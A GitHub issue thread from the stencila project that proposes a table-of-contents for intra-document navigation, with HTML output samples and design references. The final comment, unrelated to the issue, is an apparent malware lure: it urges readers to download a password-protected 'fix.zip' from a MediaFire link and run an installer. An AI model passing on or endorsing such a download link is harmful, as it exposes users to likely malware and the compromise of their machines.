### ISSUE TITLE
feat(web): add a TOC for intra-doc navigation

### ISSUE THREAD

**Issue by nokome** [stencila/stencila#2312]
## Status

A new property `headings` has been added to `Article`. This property is populated, during the "compile" phase of the execution engine, with a nested `List` with `Link`s to each heading in the document.

This property is encoding to "DOM HTML" (what we send to the browser) as a `<nav slot=headings>` e.g.

```sh
cargo run -p cli compile examples/nodes/article-headings/article-headings.md --to dom --pretty
```

```html
<stencila-article id=art_FqCiGKhewxKksRZdKTWXxk depth=0 ancestors='' root>
  <nav slot=headings>
    <stencila-list id=lst_KpMnZyxCsxxh7mzhamemPY depth=1 ancestors=Article order=Ascending>
      <ol slot=items>
        <stencila-list-item id=lsi_5k3b3ptdrAFGcDgGY5v9g8 depth=2 ancestors=Article.List>
          <li slot=content>
            <stencila-paragraph id=pgh_6LHCuTvgJswcDBDGrVVsYK depth=3 ancestors=Article.List.ListItem>
              <p slot=content>
                <stencila-link id=lin_XQZU7oNJYYRzjJphfVVSv1 depth=4 ancestors=Article.List.ListItem.Paragraph>
                  <a href=#hea_LfoiH3BQLetMhigF2FE4RR>
                    <span slot=content>
                      <stencila-text id=txt_CyWbnNfT5VayZzYmZmJJ8z depth=5 ancestors=Article.List.ListItem.Paragraph.Link>Heading 1</stencila-text>
                    </span>
                  </a>
                </stencila-link>
              </p>
            </stencila-paragraph>
...
```

Currently this property is slotted in such a way that is is not displayed:

```jsx
      <!-- TODO: <stencila-ui-article-headings> component -->
      <div style="display:none">
        <slot name="headings"></slot>
      </div>
```

But, if you remove the `display:none` you can see the nested list of links to headings rendered in the browser:

![image](https://github.com/user-attachments/assets/37661e3f-78d1-4f36-a7e5-8489e3443fe8)

(Obviously we currently have `<stencila-list>` components rendering withing the headings list, which we will have to reverse).

## Inspo

There are plenty of examples of HTML TOCs around. Many are similar to Mintlify's e.g. https://mintlify.com/docs/text

![image](https://github.com/user-attachments/assets/709b58cb-71bf-40cc-b387-f35a9b3fe159)

But IMO, the state-of-the-art is Clerk's "follow along line" - it manages to give a lot of context as to where you are in the doc without being too busy e.g. https://clerk.com/docs/organizations/roles-permissions:

[Screencast from 2024-08-29 15-25-34.webm](https://github.com/user-attachments/assets/70bdda8b-65b2-45b5-a09c-682788f8720b)

The TOC should be hidden on small devices.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
